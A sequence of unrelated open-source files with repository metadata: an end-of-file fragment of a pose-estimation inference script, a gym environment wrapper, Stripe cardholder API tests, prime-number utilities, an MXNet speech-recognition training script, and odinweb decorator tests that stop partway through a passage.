'pose2d_gt_posenet_err_mean': ([], tf.float32),
'pose3d_gt_backaligned_pose2d_gt_err': ([report_n], tf.float32),
# input data
'pose3d': ([17, 3], tf.float64),
'cam_pose3d': ([n_cam, 3], tf.float64),
'cam_rot': ([n_cam, 3, 3], tf.float64),
'cam_intr': ([n_cam, 4], tf.float64),
'cam_kd': ([n_cam, 5], tf.float64),
'pose2d_gt': ([n_cam, 17, 2], tf.float64),
'pose2d_repr': ([n_cam, 17, 2], tf.float64),
'heatmaps': ([n_cam, 17, 4, 4], tf.float64),
# note! pose2d_pred is actually the "mean heatmap" 2D pred
'pose2d_pred': ([n_cam, 17, 2], tf.float64),
'keys': ([n_cam], tf.string),
'bboxes': ([n_cam, 4], tf.int32),
'pose3d_epi_pred': ([n_cam, 17, 3], tf.float32),
'cam_subset': ([n_cam], tf.int32),
}
output_spec = tfds.features.FeaturesDict({
k: tfds.features.Tensor(shape=s, dtype=d)
for k, (s, d) in output_shape_dtype.items()
})
ds = data_utils.read_tfrec_feature_dict_ds(_INPUT_PATH.value)
if _DEBUG_FIRST_N.value is not None:
ds = ds.take(_DEBUG_FIRST_N.value)
dataset = []
for _, data_rec in ds:
opt_stats = inf_opt.run_inference_optimization(
data_rec=data_rec,
opt_steps=_N_STEPS.value,
report_n_results=_REPORT_N_APPROX.value,
cam_subset=cam_subset,
edge_lens_lambda=_EDGE_LENS_LAMBDA.value,
fake_gt_heatmaps=_GT_HEATMAPS.value,
fake_gt_ht_std=_FAKE_GT_HT_STD.value,
fake_gt_init=_FAKE_GT_INIT.value,
random_init=_RANDOM_INIT.value,
recompute_weak_repr=_USE_WEAK_REPR.value,
learning_rate=_LEARNING_RATE.value)
print('pmpjpe', opt_stats['pose3d_pred_pmpjpe'][-1])
dataset.append(opt_stats)
data_utils.write_tfrec_feature_dict_ds(
dataset, output_spec, _OUTPUT_PATH.value)
if __name__ == '__main__':
app.run(main)
|
{
"content_hash": "d4a4f9e843fbdfaeb276ebd52a1d6d71",
"timestamp": "",
"source": "github",
"line_count": 126,
"max_line_length": 79,
"avg_line_length": 37.03174603174603,
"alnum_prop": 0.6328761251607372,
"repo_name": "google-research/google-research",
"id": "5cb5891ba04d0b3c481ca3b5fc5261fc95bd5a1e",
"size": "5274",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "metapose/launch_iterative_solver.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "9817"
},
{
"name": "C++",
"bytes": "4166670"
},
{
"name": "CMake",
"bytes": "6412"
},
{
"name": "CSS",
"bytes": "27092"
},
{
"name": "Cuda",
"bytes": "1431"
},
{
"name": "Dockerfile",
"bytes": "7145"
},
{
"name": "Gnuplot",
"bytes": "11125"
},
{
"name": "HTML",
"bytes": "77599"
},
{
"name": "ImageJ Macro",
"bytes": "50488"
},
{
"name": "Java",
"bytes": "487585"
},
{
"name": "JavaScript",
"bytes": "896512"
},
{
"name": "Julia",
"bytes": "67986"
},
{
"name": "Jupyter Notebook",
"bytes": "71290299"
},
{
"name": "Lua",
"bytes": "29905"
},
{
"name": "MATLAB",
"bytes": "103813"
},
{
"name": "Makefile",
"bytes": "5636"
},
{
"name": "NASL",
"bytes": "63883"
},
{
"name": "Perl",
"bytes": "8590"
},
{
"name": "Python",
"bytes": "53790200"
},
{
"name": "R",
"bytes": "101058"
},
{
"name": "Roff",
"bytes": "1208"
},
{
"name": "Rust",
"bytes": "2389"
},
{
"name": "Shell",
"bytes": "730444"
},
{
"name": "Smarty",
"bytes": "5966"
},
{
"name": "Starlark",
"bytes": "245038"
}
],
"symlink_target": ""
}
|
"""Allows using emdp as a gym environment."""
import numpy as np
import gym
from gym import spaces
import emdp.utils as utils
def gymify(mdp, **kwargs):
return GymToMDP(mdp, **kwargs)
class GymToMDP(gym.Env):
def __init__(self, mdp, observation_one_hot=True):
"""
:param mdp: The emdp.MDP object to wrap.
:param observation_one_hot: Boolean indicating if the observation space
should be one hot or an integer.
"""
self.mdp = mdp
if observation_one_hot:
self.observation_space = spaces.Box(
low=0, high=1, shape=(self.mdp.state_space, ), dtype=np.int32)
else:
self.observation_space = spaces.Discrete(self.mdp.state_space)
self.action_space = spaces.Discrete(self.mdp.action_space)
self._obs_one_hot = observation_one_hot
def reset(self):
return self.maybe_convert_state(self.mdp.reset())
def step(self, action):
state, reward, done, info = self.mdp.step(action)
return (self.maybe_convert_state(state),
reward, done, info)
def seed(self, seed):
self.mdp.set_seed(seed)
# TODO:
def render(self):
pass
def maybe_convert_state(self, state):
if self._obs_one_hot:
return state
else:
return utils.convert_onehot_to_int(state)
|
{
"content_hash": "3f6e58017a11e39c6192771a38ee2797",
"timestamp": "",
"source": "github",
"line_count": 52,
"max_line_length": 79,
"avg_line_length": 26.826923076923077,
"alnum_prop": 0.6,
"repo_name": "zafarali/emdp",
"id": "15b0ae9bd8ca0da84d79cdc194a66ff1203252f3",
"size": "1395",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "emdp/emdp_gym/gym_wrap.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "72669"
}
],
"symlink_target": ""
}
|
from __future__ import absolute_import, division, print_function
import stripe
TEST_RESOURCE_ID = "ich_123"
class TestCardholder(object):
def test_is_creatable(self, request_mock):
resource = stripe.issuing.Cardholder.create(
billing={
"address": {
"city": "city",
"country": "US",
"line1": "line1",
"postal_code": "postal_code",
}
},
name="Jenny Rosen",
type="individual",
)
request_mock.assert_requested("post", "/v1/issuing/cardholders")
assert isinstance(resource, stripe.issuing.Cardholder)
def test_is_listable(self, request_mock):
resources = stripe.issuing.Cardholder.list()
request_mock.assert_requested("get", "/v1/issuing/cardholders")
assert isinstance(resources.data, list)
assert isinstance(resources.data[0], stripe.issuing.Cardholder)
def test_is_modifiable(self, request_mock):
resource = stripe.issuing.Cardholder.modify(
TEST_RESOURCE_ID, metadata={"key": "value"}
)
request_mock.assert_requested(
"post", "/v1/issuing/cardholders/%s" % TEST_RESOURCE_ID
)
assert isinstance(resource, stripe.issuing.Cardholder)
def test_is_retrievable(self, request_mock):
resource = stripe.issuing.Cardholder.retrieve(TEST_RESOURCE_ID)
request_mock.assert_requested(
"get", "/v1/issuing/cardholders/%s" % TEST_RESOURCE_ID
)
assert isinstance(resource, stripe.issuing.Cardholder)
def test_is_saveable(self, request_mock):
resource = stripe.issuing.Cardholder.retrieve(TEST_RESOURCE_ID)
resource.metadata["key"] = "value"
cardholder = resource.save()
request_mock.assert_requested(
"post", "/v1/issuing/cardholders/%s" % TEST_RESOURCE_ID
)
assert isinstance(resource, stripe.issuing.Cardholder)
assert resource is cardholder
|
{
"content_hash": "e3a28e33db9f1e270d14d30b366be15a",
"timestamp": "",
"source": "github",
"line_count": 56,
"max_line_length": 72,
"avg_line_length": 36.69642857142857,
"alnum_prop": 0.6072992700729927,
"repo_name": "stripe/stripe-python",
"id": "81c789f12e3be6b35057d21bf335e3680c078ffa",
"size": "2055",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/api_resources/issuing/test_cardholder.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "1198"
},
{
"name": "Python",
"bytes": "748390"
}
],
"symlink_target": ""
}
|
from bisect import bisect_right
from itertools import chain, count
from typing import Generator, List, Sequence, Tuple
from ..sqrt import fast_fsqrt as fsqrt
def is_prime(n: int, sieve: List[int]=None) -> bool:
if n <= 1:
return False
if sieve is None:
for factor in range(2, fsqrt(n) + 1):
if n % factor == 0:
return False
elif n <= sieve[-1]:
index = bisect_right(sieve, n)
if not index or sieve[index - 1] != n:
return False
elif n <= sieve[-1] ** 2:
fsqrt_n = fsqrt(n)
for factor in sieve:
if factor > fsqrt_n:
break
if n % factor == 0:
return False
else:
for factor in chain(sieve, range(sieve[-1] + 1, fsqrt(n) + 1)):
if n % factor == 0:
return False
return True
def smallest_prime_factor(n: int, sieve: Sequence[int]=None) -> int:
if n <= 1:
raise ValueError(f'Cannot find smallest prime factor of {n}.')
for factor in range(2, fsqrt(n) + 1) if sieve is None else sieve:
if n % factor == 0:
return factor
return n
def generate_prime_factors(n: int, sieve: Sequence[int]=None) -> \
Generator[int, None, None]:
while n > 1:
factor = smallest_prime_factor(n, sieve)
yield factor
while n % factor == 0:
n //= factor
def generate_prime_factors_multiplicity(n: int, sieve: Sequence[int] = None) \
-> Generator[Tuple[int, int], None, None]:
while n > 1:
factor = smallest_prime_factor(n, sieve)
multiplicity = 0
while n % factor == 0:
n //= factor
multiplicity += 1
yield factor, multiplicity
def largest_prime_factor(n: int) -> int:
if n <= 1:
raise ValueError(f'Cannot find largest prime factor of {n}.')
bound = fsqrt(n) + 1
factor = 2
while factor <= bound:
if n % factor == 0:
while n % factor == 0:
n //= factor
if n == 1:
return factor
bound = fsqrt(n) + 1
factor += 1
return n
def prime_sieve(n: int) -> Sequence[int]:
"""
From here:
http://stackoverflow.com/questions/2068372/fastest-way-to-list-all
-primes-below-n/3035188#3035188
"""
import numpy as np
if n <= 1:
return [False] * n
sieve = np.ones(n // 3 + (n % 6 == 2), dtype=np.bool)
for i in range(1, fsqrt(n) // 3 + 1):
if sieve[i]:
k = 3 * i + 1 | 1
sieve[k * k // 3::2 * k] = False
sieve[k * (k - 2 * (i & 1) + 4) // 3::2 * k] = False
return np.r_[2, 3, ((3 * np.nonzero(sieve)[0][1:] + 1) | 1)].tolist()
def primes_sequence() -> Generator[int, None, None]:
for n in count(2):
if is_prime(n):
yield n
n += 1
|
{
"content_hash": "0abd205a454cc6d6aad26c222c105586",
"timestamp": "",
"source": "github",
"line_count": 122,
"max_line_length": 78,
"avg_line_length": 23.84426229508197,
"alnum_prop": 0.5139223100721898,
"repo_name": "cryvate/project-euler",
"id": "2bebc5998efe6dc5c1447264fed2d18705706a38",
"size": "2909",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "project_euler/library/number_theory/primes.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "144699"
},
{
"name": "Shell",
"bytes": "2323"
}
],
"symlink_target": ""
}
|
import json
import os
import sys
from collections import namedtuple
from datetime import datetime
from config_util import parse_args, parse_contexts, generate_file_path
from train import do_training
import mxnet as mx
from stt_io_iter import STTIter
from label_util import LabelUtil
from log_util import LogUtil
import numpy as np
from stt_datagenerator import DataGenerator
from stt_metric import STTMetric
from stt_bi_graphemes_util import generate_bi_graphemes_dictionary
from stt_bucketing_module import STTBucketingModule
from stt_io_bucketingiter import BucketSTTIter
sys.path.insert(0, "../../python")
# os.environ['MXNET_ENGINE_TYPE'] = "NaiveEngine"
os.environ['MXNET_ENGINE_TYPE'] = "ThreadedEnginePerDevice"
os.environ['MXNET_ENABLE_GPU_P2P'] = "0"
class WHCS:
width = 0
height = 0
channel = 0
stride = 0
class ConfigLogger(object):
def __init__(self, log):
self.__log = log
def __call__(self, config):
self.__log.info("Config:")
config.write(self)
def write(self, data):
# stripping the data makes the output nicer and avoids empty lines
line = data.strip()
self.__log.info(line)
def load_labelutil(labelUtil, is_bi_graphemes, language="en"):
if language == "en":
if is_bi_graphemes:
try:
labelUtil.load_unicode_set("resources/unicodemap_en_baidu_bi_graphemes.csv")
except:
raise Exception("There is no resources/unicodemap_en_baidu_bi_graphemes.csv." +
" Please set overwrite_bi_graphemes_dictionary True at train section")
else:
labelUtil.load_unicode_set("resources/unicodemap_en_baidu.csv")
else:
raise Exception("Error: Language Type: %s" % language)
def load_data(args):
mode = args.config.get('common', 'mode')
if mode not in ['train', 'predict', 'load']:
raise Exception('mode must be the one of the followings - train,predict,load')
batch_size = args.config.getint('common', 'batch_size')
whcs = WHCS()
whcs.width = args.config.getint('data', 'width')
whcs.height = args.config.getint('data', 'height')
whcs.channel = args.config.getint('data', 'channel')
whcs.stride = args.config.getint('data', 'stride')
save_dir = 'checkpoints'
model_name = args.config.get('common', 'prefix')
is_bi_graphemes = args.config.getboolean('common', 'is_bi_graphemes')
overwrite_meta_files = args.config.getboolean('train', 'overwrite_meta_files')
overwrite_bi_graphemes_dictionary = args.config.getboolean('train', 'overwrite_bi_graphemes_dictionary')
max_duration = args.config.getfloat('data', 'max_duration')
language = args.config.get('data', 'language')
log = LogUtil().getlogger()
labelUtil = LabelUtil.getInstance()
if mode == "train" or mode == "load":
data_json = args.config.get('data', 'train_json')
val_json = args.config.get('data', 'val_json')
datagen = DataGenerator(save_dir=save_dir, model_name=model_name)
datagen.load_train_data(data_json, max_duration=max_duration)
if is_bi_graphemes:
if not os.path.isfile("resources/unicodemap_en_baidu_bi_graphemes.csv") or overwrite_bi_graphemes_dictionary:
load_labelutil(labelUtil=labelUtil, is_bi_graphemes=False, language=language)
generate_bi_graphemes_dictionary(datagen.train_texts)
load_labelutil(labelUtil=labelUtil, is_bi_graphemes=is_bi_graphemes, language=language)
args.config.set('arch', 'n_classes', str(labelUtil.get_count()))
if mode == "train":
if overwrite_meta_files:
log.info("Generate mean and std from samples")
normalize_target_k = args.config.getint('train', 'normalize_target_k')
datagen.sample_normalize(normalize_target_k, True)
else:
log.info("Read mean and std from meta files")
datagen.get_meta_from_file(
np.loadtxt(generate_file_path(save_dir, model_name, 'feats_mean')),
np.loadtxt(generate_file_path(save_dir, model_name, 'feats_std')))
datagen.load_validation_data(val_json, max_duration=max_duration)
elif mode == "load":
# get feat_mean and feat_std to normalize dataset
datagen.get_meta_from_file(
np.loadtxt(generate_file_path(save_dir, model_name, 'feats_mean')),
np.loadtxt(generate_file_path(save_dir, model_name, 'feats_std')))
datagen.load_validation_data(val_json, max_duration=max_duration)
elif mode == 'predict':
test_json = args.config.get('data', 'test_json')
datagen = DataGenerator(save_dir=save_dir, model_name=model_name)
datagen.load_train_data(test_json, max_duration=max_duration)
labelutil = load_labelutil(labelUtil, is_bi_graphemes, language="en")
args.config.set('arch', 'n_classes', str(labelUtil.get_count()))
datagen.get_meta_from_file(
np.loadtxt(generate_file_path(save_dir, model_name, 'feats_mean')),
np.loadtxt(generate_file_path(save_dir, model_name, 'feats_std')))
is_batchnorm = args.config.getboolean('arch', 'is_batchnorm')
if batch_size == 1 and is_batchnorm and (mode == 'train' or mode == 'load'):
raise Warning('batch size 1 is too small for is_batchnorm')
# sort file paths by its duration in ascending order to implement sortaGrad
if mode == "train" or mode == "load":
max_t_count = datagen.get_max_seq_length(partition="train")
max_label_length = \
datagen.get_max_label_length(partition="train", is_bi_graphemes=is_bi_graphemes)
elif mode == "predict":
max_t_count = datagen.get_max_seq_length(partition="test")
max_label_length = \
datagen.get_max_label_length(partition="test", is_bi_graphemes=is_bi_graphemes)
args.config.set('arch', 'max_t_count', str(max_t_count))
args.config.set('arch', 'max_label_length', str(max_label_length))
from importlib import import_module
prepare_data_template = import_module(args.config.get('arch', 'arch_file'))
init_states = prepare_data_template.prepare_data(args)
sort_by_duration = (mode == "train")
is_bucketing = args.config.getboolean('arch', 'is_bucketing')
save_feature_as_csvfile = args.config.getboolean('train', 'save_feature_as_csvfile')
if is_bucketing:
buckets = json.loads(args.config.get('arch', 'buckets'))
data_loaded = BucketSTTIter(partition="train",
count=datagen.count,
datagen=datagen,
batch_size=batch_size,
num_label=max_label_length,
init_states=init_states,
seq_length=max_t_count,
width=whcs.width,
height=whcs.height,
sort_by_duration=sort_by_duration,
is_bi_graphemes=is_bi_graphemes,
buckets=buckets,
save_feature_as_csvfile=save_feature_as_csvfile)
else:
data_loaded = STTIter(partition="train",
count=datagen.count,
datagen=datagen,
batch_size=batch_size,
num_label=max_label_length,
init_states=init_states,
seq_length=max_t_count,
width=whcs.width,
height=whcs.height,
sort_by_duration=sort_by_duration,
is_bi_graphemes=is_bi_graphemes,
save_feature_as_csvfile=save_feature_as_csvfile)
if mode == 'train' or mode == 'load':
if is_bucketing:
validation_loaded = BucketSTTIter(partition="validation",
count=datagen.val_count,
datagen=datagen,
batch_size=batch_size,
num_label=max_label_length,
init_states=init_states,
seq_length=max_t_count,
width=whcs.width,
height=whcs.height,
sort_by_duration=False,
is_bi_graphemes=is_bi_graphemes,
buckets=buckets,
save_feature_as_csvfile=save_feature_as_csvfile)
else:
validation_loaded = STTIter(partition="validation",
count=datagen.val_count,
datagen=datagen,
batch_size=batch_size,
num_label=max_label_length,
init_states=init_states,
seq_length=max_t_count,
width=whcs.width,
height=whcs.height,
sort_by_duration=False,
is_bi_graphemes=is_bi_graphemes,
save_feature_as_csvfile=save_feature_as_csvfile)
return data_loaded, validation_loaded, args
elif mode == 'predict':
return data_loaded, args
def load_model(args, contexts, data_train):
# load model from model_name prefix and epoch of model_num_epoch with gpu contexts of contexts
mode = args.config.get('common', 'mode')
load_optimizer_states = args.config.getboolean('load', 'load_optimizer_states')
is_start_from_batch = args.config.getboolean('load', 'is_start_from_batch')
from importlib import import_module
symbol_template = import_module(args.config.get('arch', 'arch_file'))
is_bucketing = args.config.getboolean('arch', 'is_bucketing')
if mode == 'train':
if is_bucketing:
bucketing_arch = symbol_template.BucketingArch(args)
model_loaded = bucketing_arch.get_sym_gen()
else:
model_loaded = symbol_template.arch(args)
model_num_epoch = None
elif mode == 'load' or mode == 'predict':
model_file = args.config.get('common', 'model_file')
model_name = os.path.splitext(model_file)[0]
model_num_epoch = int(model_name[-4:])
if is_bucketing:
bucketing_arch = symbol_template.BucketingArch(args)
model_loaded = bucketing_arch.get_sym_gen()
else:
model_path = 'checkpoints/' + str(model_name[:-5])
data_names = [x[0] for x in data_train.provide_data]
label_names = [x[0] for x in data_train.provide_label]
model_loaded = mx.module.Module.load(
prefix=model_path, epoch=model_num_epoch, context=contexts,
data_names=data_names, label_names=label_names,
load_optimizer_states=load_optimizer_states)
if is_start_from_batch:
import re
model_num_epoch = int(re.findall('\d+', model_file)[0])
return model_loaded, model_num_epoch
if __name__ == '__main__':
if len(sys.argv) <= 1:
raise Exception('cfg file path must be provided. ' +
'ex)python main.py --configfile examplecfg.cfg')
args = parse_args(sys.argv[1])
# set parameters from cfg file
# give random seed
random_seed = args.config.getint('common', 'random_seed')
mx_random_seed = args.config.getint('common', 'mx_random_seed')
# random seed for shuffling data list
if random_seed != -1:
np.random.seed(random_seed)
# set mx.random.seed to give seed for parameter initialization
if mx_random_seed != -1:
mx.random.seed(mx_random_seed)
else:
mx.random.seed(hash(datetime.now()))
# set log file name
log_filename = args.config.get('common', 'log_filename')
log = LogUtil(filename=log_filename).getlogger()
# set parameters from data section(common)
mode = args.config.get('common', 'mode')
if mode not in ['train', 'predict', 'load']:
raise Exception(
'Define mode in the cfg file first. ' +
'train or predict or load can be the candidate for the mode.')
# get meta file where character to number conversions are defined
contexts = parse_contexts(args)
num_gpu = len(contexts)
batch_size = args.config.getint('common', 'batch_size')
# check the number of gpus is positive divisor of the batch size for data parallel
if batch_size % num_gpu != 0:
raise Exception('num_gpu should be positive divisor of batch_size')
if mode == "train" or mode == "load":
data_train, data_val, args = load_data(args)
elif mode == "predict":
data_train, args = load_data(args)
is_batchnorm = args.config.getboolean('arch', 'is_batchnorm')
is_bucketing = args.config.getboolean('arch', 'is_bucketing')
# log current config
config_logger = ConfigLogger(log)
config_logger(args.config)
# load model
model_loaded, model_num_epoch = load_model(args, contexts, data_train)
# if mode is 'train', it trains the model
if mode == 'train':
if is_bucketing:
module = STTBucketingModule(
sym_gen=model_loaded,
default_bucket_key=data_train.default_bucket_key,
context=contexts
)
else:
data_names = [x[0] for x in data_train.provide_data]
label_names = [x[0] for x in data_train.provide_label]
module = mx.mod.Module(model_loaded, context=contexts,
data_names=data_names, label_names=label_names)
do_training(args=args, module=module, data_train=data_train, data_val=data_val)
# if mode is 'load', it loads model from the checkpoint and continues the training.
elif mode == 'load':
do_training(args=args, module=model_loaded, data_train=data_train, data_val=data_val,
begin_epoch=model_num_epoch + 1)
# if mode is 'predict', it predict label from the input by the input model
elif mode == 'predict':
# predict through data
if is_bucketing:
max_t_count = args.config.getint('arch', 'max_t_count')
load_optimizer_states = args.config.getboolean('load', 'load_optimizer_states')
model_file = args.config.get('common', 'model_file')
model_name = os.path.splitext(model_file)[0]
model_num_epoch = int(model_name[-4:])
model_path = 'checkpoints/' + str(model_name[:-5])
model = STTBucketingModule(
sym_gen=model_loaded,
default_bucket_key=data_train.default_bucket_key,
context=contexts
)
model.bind(data_shapes=data_train.provide_data,
label_shapes=data_train.provide_label,
for_training=True)
_, arg_params, aux_params = mx.model.load_checkpoint(model_path, model_num_epoch)
model.set_params(arg_params, aux_params)
model_loaded = model
else:
model_loaded.bind(for_training=False, data_shapes=data_train.provide_data,
label_shapes=data_train.provide_label)
max_t_count = args.config.getint('arch', 'max_t_count')
eval_metric = STTMetric(batch_size=batch_size, num_gpu=num_gpu)
if is_batchnorm:
for nbatch, data_batch in enumerate(data_train):
model_loaded.forward(data_batch, is_train=False)
model_loaded.update_metric(eval_metric, data_batch.label)
else:
#model_loaded.score(eval_data=data_train, num_batch=None,
# eval_metric=eval_metric, reset=True)
for nbatch, data_batch in enumerate(data_train):
model_loaded.forward(data_batch, is_train=False)
model_loaded.update_metric(eval_metric, data_batch.label)
else:
raise Exception(
'Define mode in the cfg file first. ' +
'train or predict or load can be the candidate for the mode')
|
{
"content_hash": "60f91a953c398af6341a7a38639ad523",
"timestamp": "",
"source": "github",
"line_count": 352,
"max_line_length": 121,
"avg_line_length": 47.80397727272727,
"alnum_prop": 0.5751470850418969,
"repo_name": "lxn2/mxnet",
"id": "a425e0a8ab409bd9a17537f5e083a5fbe883a0c9",
"size": "16827",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "example/speech_recognition/main.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "10619"
},
{
"name": "C",
"bytes": "89393"
},
{
"name": "C++",
"bytes": "3189126"
},
{
"name": "CMake",
"bytes": "48546"
},
{
"name": "Cuda",
"bytes": "566898"
},
{
"name": "Groovy",
"bytes": "217"
},
{
"name": "Java",
"bytes": "16368"
},
{
"name": "Jupyter Notebook",
"bytes": "1229390"
},
{
"name": "Makefile",
"bytes": "40032"
},
{
"name": "Matlab",
"bytes": "30187"
},
{
"name": "Perl",
"bytes": "615878"
},
{
"name": "Perl6",
"bytes": "21993"
},
{
"name": "Protocol Buffer",
"bytes": "77256"
},
{
"name": "Python",
"bytes": "3084885"
},
{
"name": "R",
"bytes": "280777"
},
{
"name": "Scala",
"bytes": "855146"
},
{
"name": "Shell",
"bytes": "109919"
}
],
"symlink_target": ""
}
|
from __future__ import absolute_import
import pytest
from collections import defaultdict
from odin.exceptions import ValidationError
from odinweb import decorators
from odinweb.constants import *
from odinweb.data_structures import NoPath, Param, HttpResponse
from odinweb.exceptions import HttpError
from odinweb.testing import MockRequest
from .resources import User
class TestOperation(object):
def test_init(self):
@decorators.Operation
def target(request):
"""
Test target
"""
assert isinstance(target, decorators.Operation)
assert target.url_path == NoPath
assert target.methods == (Method.GET,)
def test_str(self):
@decorators.Operation(path="test/{id}/start")
def target(request):
"""
Test target
"""
assert "tests.test_decorators.target - GET test/{id:Integer}/start" == str(target)
def test_repr(self):
@decorators.Operation(path="test/{id}/start")
def target(request):
"""
Test target
"""
assert "Operation('tests.test_decorators.target', " \
"UrlPath('test', PathParam(name='id', type=<Type.Integer: 'integer:int32'>, type_args=None), 'start'), " \
"(<Method.GET: 'GET'>,))" == repr(target)
def test_unbound(self):
@decorators.Operation(tags=('eek', 'bar'))
def target(request):
"""
Test target
"""
return 'foo'
request = MockRequest()
assert target.resource is None
assert not target.is_bound
assert target.tags == {'eek', 'bar'}
actual = target(request, {})
assert actual == 'foo'
def test_bind_to_instance(self):
@decorators.Operation(tags=('eek', 'bar'))
def target(binding, request):
"""
Test target
"""
assert binding == api
return 'foo'
class MockApi(object):
def __init__(self):
self.call_count = defaultdict(int)
self.resource = User
self.tags = {'bar'}
def pre_dispatch(self, request, path_args):
self.call_count['pre_dispatch'] += 1
def post_dispatch(self, request, response):
self.call_count['post_dispatch'] += 1
return response
api = MockApi()
request = MockRequest()
target.bind_to_instance(api)
assert target.binding == api
assert target.resource is User
assert target.is_bound
assert target.tags == {'eek', 'bar'}
actual = target(request, {})
assert actual == 'foo'
assert api.call_count == {'pre_dispatch': 1, 'post_dispatch': 1}
@pytest.mark.parametrize('decorator, init_args, expected', (
(decorators.Operation, {}, {}),
(decorators.Operation, {'tags': 'foo'}, {'tags': ['foo']}),
))
def test_to_swagger(self, decorator, init_args, expected):
@decorator(**init_args)
def my_func(request):
"""
My Func
"""
pass
# Set some common defaults
expected.setdefault('operationId', 'tests.test_decorators.my_func')
expected.setdefault('description', 'My Func')
expected.setdefault('responses', {'default': {
'description': 'Unhandled error',
'schema': {'$ref': '#/definitions/Error'}
}})
actual = my_func.to_swagger()
assert actual == expected
class TestWrappedListOperation(object):
@pytest.mark.parametrize('options, offset, limit', (
({}, 0, 50),
({'default_limit': 10}, 0, 10),
))
def test_documentation_applied(self, options, offset, limit):
@decorators.listing(**options)
def my_func(request):
pass
assert my_func.default_offset == offset
assert my_func.default_limit == limit
@pytest.mark.parametrize('options, query, offset, limit, bare', (
({}, {}, 0, 50, False),
({}, {'offset': 10}, 10, 50, False),
({}, {'limit': 20}, 0, 20, False),
({}, {'bare': 'F'}, 0, 50, False),
({}, {'bare': 'T'}, 0, 50, True),
({}, {'bare': 'yes'}, 0, 50, True),
({}, {'offset': 10, 'limit': 20, 'bare': '1'}, 10, 20, True),
# Max limit
({'max_limit': 100}, {}, 0, 50, False),
({'max_limit': 100}, {'offset': 10, 'limit': 100}, 10, 100, False),
({'max_limit': 100}, {'offset': 10, 'limit': 102}, 10, 100, False),
# Silly values?
({}, {'offset': -1}, 0, 50, False),
({}, {'limit': -1}, 0, 1, False),
({}, {'limit': 0}, 0, 1, False),
({}, {'offset': -1, 'limit': -1}, 0, 1, False),
))
def test_options_handled(self, options, query, offset, limit, bare):
mock_request = MockRequest(query=query)
@decorators.WrappedListOperation(**options)
def my_func(request, **kwargs):
assert request is mock_request
assert kwargs['offset'] == offset
assert kwargs['limit'] == limit
assert kwargs['foo'] == 'bar'
return [1, 2, 3]
result = my_func(mock_request, {'foo': 'bar'})
if bare:
assert result == [1, 2, 3]
else:
assert isinstance(result, decorators.Listing)
assert result.results == [1, 2, 3]
assert result.offset == offset
assert result.limit == limit
assert result.total_count is None
def test_returning_total_count(self):
mock_request = MockRequest()
@decorators.WrappedListOperation
def my_func(request, foo, offset, limit):
assert foo == 'bar'
assert offset == 0
assert limit == 50
return [1, 2, 3], 5
result = my_func(mock_request, {'foo': 'bar'})
assert isinstance(result, decorators.Listing)
assert result.results == [1, 2, 3]
assert result.offset == 0
assert result.limit == 50
assert result.total_count == 5
class TestListOperation(object):
@pytest.mark.parametrize('options, offset, limit', (
({}, 0, 50),
({'default_limit': 10}, 0, 10),
))
def test_documentation_applied(self, options, offset, limit):
options.setdefault('use_wrapper', False)
@decorators.listing(**options)
def my_func(request):
pass
assert my_func.default_offset == offset
assert my_func.default_limit == limit
@pytest.mark.parametrize('options, query, offset, limit', (
({}, {}, 0, 50),
({}, {'offset': 10}, 10, 50),
({}, {'limit': 20}, 0, 20),
({}, {'offset': 10, 'limit': 20}, 10, 20),
# Max limit
({'max_limit': 100}, {}, 0, 50),
({'max_limit': 100}, {'offset': 10, 'limit': 100}, 10, 100),
))
def test_options_handled(self, options, query, offset, limit):
mock_request = MockRequest(query=query)
@decorators.ListOperation(**options)
def my_func(request, **kwargs):
assert request is mock_request
assert kwargs['offset'] == offset
assert kwargs['limit'] == limit
assert kwargs['foo'] == 'bar'
return [1, 2, 3]
result = my_func(mock_request, {'foo': 'bar'})
assert isinstance(result, HttpResponse)
assert result.body == '[1, 2, 3]'
assert result['X-Page-Offset'] == str(offset)
assert result['X-Page-Limit'] == str(limit)
assert 'X-Total-Count' not in result.headers
@pytest.mark.parametrize('options, query, expected_errors', (
({}, {'offset': ''}, 1),
({}, {'offset': 'abc'}, 1),
({}, {'offset': 'xyz'}, 1),
({}, {'limit': ''}, 1),
({}, {'limit': 'abc'}, 1),
({}, {'limit': 'xyz'}, 1),
({}, {'limit': '', 'offset': ''}, 2),
# Outside limits
({}, {'offset': '-1'}, 1),
({}, {'limit': '-1'}, 1),
({'max_limit': 60}, {'limit': '61'}, 1),
))
def test_bad_values(self, options, query, expected_errors):
mock_request = MockRequest(query=query)
@decorators.ListOperation(**options)
def my_func(request, **kwargs):
return [1, 2, 3]
with pytest.raises(ValidationError) as error:
my_func(mock_request, {'foo': 'bar'})
assert len(error.value.error_messages) == expected_errors
def test_returning_total_count(self):
mock_request = MockRequest()
@decorators.ListOperation
def my_func(request, foo, offset, limit):
assert foo == 'bar'
assert offset == 0
assert limit == 50
return [1, 2, 3], 5
result = my_func(mock_request, {'foo': 'bar'})
assert isinstance(result, HttpResponse)
assert result.body == '[1, 2, 3]'
assert result['X-Page-Offset'] == '0'
assert result['X-Page-Limit'] == '50'
assert result['X-Total-Count'] == '5'
class TestResourceOperation(object):
def test_documentation_applied(self):
@decorators.ResourceOperation(resource=User)
def my_func(request, user):
pass
assert Param.body() in my_func.parameters
def test_execute(self):
@decorators.ResourceOperation(resource=User)
def my_func(request, user):
assert isinstance(user, User)
assert user.name == "Stephen"
request = MockRequest(body='{"id": 1, "name": "Stephen"}')
my_func(request, {})
def test_execute__invalid(self):
@decorators.ResourceOperation(resource=User)
def my_func(request, user):
assert isinstance(user, User)
assert user.name == "Stephen"
request = MockRequest(body='{"id": 1, "name": "Stephen"')
with pytest.raises(HttpError):
my_func(request, {})
@pytest.mark.parametrize('decorator, klass, method', (
(decorators.listing, decorators.WrappedListOperation, Method.GET),
(decorators.create, decorators.ResourceOperation, Method.POST),
(decorators.detail, decorators.Operation, Method.GET),
